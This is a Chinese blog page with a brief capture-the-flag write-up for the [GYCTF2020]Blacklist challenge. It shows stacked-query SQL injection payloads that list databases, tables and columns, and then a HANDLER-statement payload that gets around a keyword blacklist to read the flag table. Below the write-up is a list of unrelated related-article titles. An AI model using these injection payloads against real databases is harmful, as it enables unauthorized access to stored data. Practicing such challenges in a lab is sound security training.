当前位置: 首页 > news >正文

[GYCTF2020]Blacklist1

news 2025/7/9 5:41:20

打开题目

判断注入类型,输入1试试

输入2

输入1'

判断为字符型注入

堆叠查询2';show databases;#

然后来输入2'; show tables;#来查看数据库的表

然后我们通过FlagHere表来查看列输入2';show columns from FlagHere;# 来查看列

重新构造payload:0';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;#得到flag

http://www.lryc.cn/news/412340.html

相关文章:

  • Blackcat V2.2付费会员制WordPress资源站主题
  • 动手学强化学习 第 18 章 离线强化学习 训练代码
  • Python笔试面试题AI答之面向对象常考知识点
  • 面试经典算法150题系列-数组/字符串操作之买卖股票最佳时机
  • 安装jdk和tomcat
  • mongodb 备份还原
  • day27——homework
  • shell脚本自动化部署
  • C语言| 文件操作详解(二)
  • 保证项目如期上线,测试人能做些什么?
  • 【杂谈】在大学如何学得计算机知识,浅谈大一经验总结
  • Superset二次开发之柱状图实现同时显示百分比、原始值、汇总值的功能
  • 堆的创建和说明
  • 【玩转python】入门篇day14-函数
  • uni-app 将base64图片转换成临时地址
  • C#用Socket实现TCP客户端
  • jmeter-beanshell学习15-输入日期,计算前后几天的日期
  • Zabbix 7.0 安装
  • 软考高级-系统架构设计师
  • Notepad++ 安装 compare 插件
  • 大数据技术原理-spark的安装
  • 第四范式上线搜广推一体化平台 赋能企业高效增长
  • 智能小程序 Ray 开发面板 SDK —— 智能设备模型通用能力一键执行 SDK 汇总(一)
  • 特大喜讯:我的作品被河北某大学选做教材
  • 将时间用于符合当下的未来思考——读《纳瓦尔宝典》
  • CentOS-Stream-9仿冒Rocky-9通过Kolla-ansible部署OpenStack 2024.1
  • Python机器学习实战:分类算法之支持向量机-垃圾邮件识别
  • 秒懂Linux之自动化构建工具-make/Makefile
  • .net core + vue 搭建前后端分离的框架
  • 小阿轩yx-KVM+GFS 分布式存储系统构建 KVM 高可用